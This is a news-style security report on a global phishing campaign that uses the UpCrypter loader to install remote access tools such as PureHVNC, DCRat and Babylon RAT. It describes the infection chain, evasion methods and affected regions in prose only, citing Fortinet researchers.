A global phishing attack is underway, targeting Windows users through deceptive emails containing UpCrypter malware. The attack, identified by cybersecurity researchers, aims to give hackers remote control over compromised systems worldwide.
Fortinet’s FortiGuard Labs has been actively tracking the UpCrypter activity. UpCrypter functions as a loader, designed to install various remote access tools (RATs). These tools enable malicious actors to maintain persistent access to infected machines, posing a significant threat to data security and system integrity.
The phishing emails are crafted to appear as legitimate notifications, often disguised as missed voicemails or purchase orders. Potential victims who interact with the attachments included in these emails are redirected to fraudulent websites. These websites are designed to mimic trusted platforms, frequently incorporating company logos to enhance credibility and deceive users into believing they are interacting with a legitimate entity.
According to Fortinet, these deceptive web pages prompt users to download a ZIP file. This file contains a heavily obfuscated JavaScript dropper, which initiates the malware infection process. Upon execution, the JavaScript dropper triggers PowerShell commands in the background. These commands establish connections to attacker-controlled servers, facilitating the download and execution of subsequent stages of the malware.
Cara Lin, a Fortinet FortiGuard Labs researcher, stated, “These pages are designed to entice recipients into downloading JavaScript files that act as droppers for UpCrypter.” This highlights the deceptive nature of the attack and the importance of user vigilance in identifying and avoiding such threats.
Once executed, UpCrypter performs a system scan to identify the presence of sandbox environments or forensic tools. These environments are often used by security researchers to analyze malware behavior. If such tools are detected, UpCrypter attempts to thwart analysis by forcing a system reboot, disrupting the investigative process.
If no monitoring tools are detected, UpCrypter proceeds to download and execute additional malicious payloads. In some instances, the attackers employ steganography, concealing these payloads within seemingly innocuous images. This technique allows them to bypass antivirus software detection mechanisms, increasing the likelihood of successful infection.
The final stage of the attack involves the deployment of several malware variants, including:
- PureHVNC: This tool grants attackers hidden remote desktop access to the compromised system, enabling them to perform unauthorized actions without the user’s knowledge.
- DCRat (DarkCrystal RAT): A multi-functional remote access tool used for spying and data exfiltration. This RAT allows attackers to steal sensitive information and monitor user activity.
- Babylon RAT: This RAT provides attackers with complete control over the infected device, allowing them to execute commands, access files, and perform other malicious activities.
Fortinet researchers have observed that the attackers utilize various methods to conceal their malicious code. These include string obfuscation, modification of registry settings for persistence, and in-memory code execution to minimize the footprint on the disk and evade detection.
The phishing campaign has been active since early August 2025 and exhibits a global reach. High volumes of activity have been observed in Austria, Belarus, Canada, Egypt, India, and Pakistan. The sectors most affected by this campaign include manufacturing, technology, healthcare, construction, and retail/hospitality. Data suggests the rapid proliferation of this threat, with detections doubling within a two-week period.
This attack is designed for long-term persistence, delivering a chain of malware that remains hidden within corporate systems. Fortinet advises, “Users and organizations should take this threat seriously, use strong email filters, and make sure staff are trained to recognize and avoid these types of attacks.”
